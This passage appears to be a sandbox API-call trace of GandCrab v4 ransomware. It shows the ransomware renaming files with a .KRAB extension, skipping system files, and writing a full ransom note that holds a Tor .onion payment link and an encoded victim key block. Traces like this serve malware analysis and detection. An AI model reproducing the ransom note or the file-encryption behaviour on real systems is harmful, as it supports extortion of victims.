F0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.598] WriteFile (in: hFile=0x774, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.599] CloseHandle (hObject=0x774) returned 1 [0076.599] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.599] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.600] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x31d)) [0076.600] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.600] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.600] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.601] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock") returned 91 [0076.601] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x774 [0076.602] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.602] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.602] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 68 [0076.602] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0076.602] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0x1023538 [0076.603] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.603] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.603] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.603] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.603] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.603] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.603] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.603] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock" [0076.603] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.603] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 96 [0076.603] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\d2ca4a08d2ca4dee3d.lock") returned 91 [0076.603] lstrlenW (lpString=".lock") returned 5 [0076.603] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.604] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.604] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.604] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.604] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.604] lstrcmpW (lpString1="events", lpString2=".") returned 1 [0076.604] lstrcmpW (lpString1="events", lpString2="..") returned 1 [0076.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="events" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events" [0076.604] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\" [0076.605] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.605] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.605] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.605] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.605] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.605] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.605] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.606] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\\\KRAB-DECRYPT.txt") returned 92 [0076.606] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x780 [0076.610] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.610] WriteFile (in: hFile=0x780, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e5a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e5a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.610] CloseHandle (hObject=0x780) returned 1 [0076.611] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.611] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.611] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x32d)) [0076.611] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.612] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.612] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.612] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock") returned 98 [0076.612] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\crash reports\\events\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x780 [0076.613] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.613] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.614] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\") returned 75 [0076.614] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*" [0076.614] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\*", lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0x10231b8 [0076.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.614] FindNextFileW (in: hFindFile=0x10231b8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0076.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.614] FindNextFileW (in: hFindFile=0x10231b8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0076.614] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.614] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.614] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock" [0076.614] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.615] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 103 [0076.615] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\d2ca4a08d2ca4dee3d.lock") returned 98 [0076.615] lstrlenW (lpString=".lock") returned 5 [0076.615] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.615] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.615] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.616] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.616] FindNextFileW (in: hFindFile=0x10231b8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0076.616] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.616] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.616] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt" [0076.616] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.616] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt.KRAB") returned 96 [0076.616] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt") returned 91 [0076.616] lstrlenW (lpString=".txt") returned 4 [0076.616] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.617] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.617] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.617] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt") returned 91 [0076.617] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\events\\KRAB-DECRYPT.txt") returned 91 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.617] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.618] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.618] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.618] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.618] FindNextFileW (in: hFindFile=0x10231b8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 0 [0076.618] FindClose (in: hFindFile=0x10231b8 | out: hFindFile=0x10231b8) returned 1 [0076.618] CloseHandle (hObject=0x780) returned 1 [0076.619] FindNextFileW (in: hFindFile=0x1023538, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.619] lstrcmpW (lpString1="InstallTime20170518000419", lpString2=".") returned 1 [0076.619] lstrcmpW (lpString1="InstallTime20170518000419", lpString2="..") returned 1 [0076.619] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="InstallTime20170518000419" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419" [0076.619] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.619] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419.KRAB") returned 98 [0076.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0076.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0076.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20170518000419") returned 93 [0076.619] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="desktop.ini") returned 1 [0076.619] lstrcmpiW (lpString1="InstallTime20170518000419", lpString2="autorun.inf") returned 1 [0076.619] lstrcmpiW (lpString1="InstallTime20170518000419", 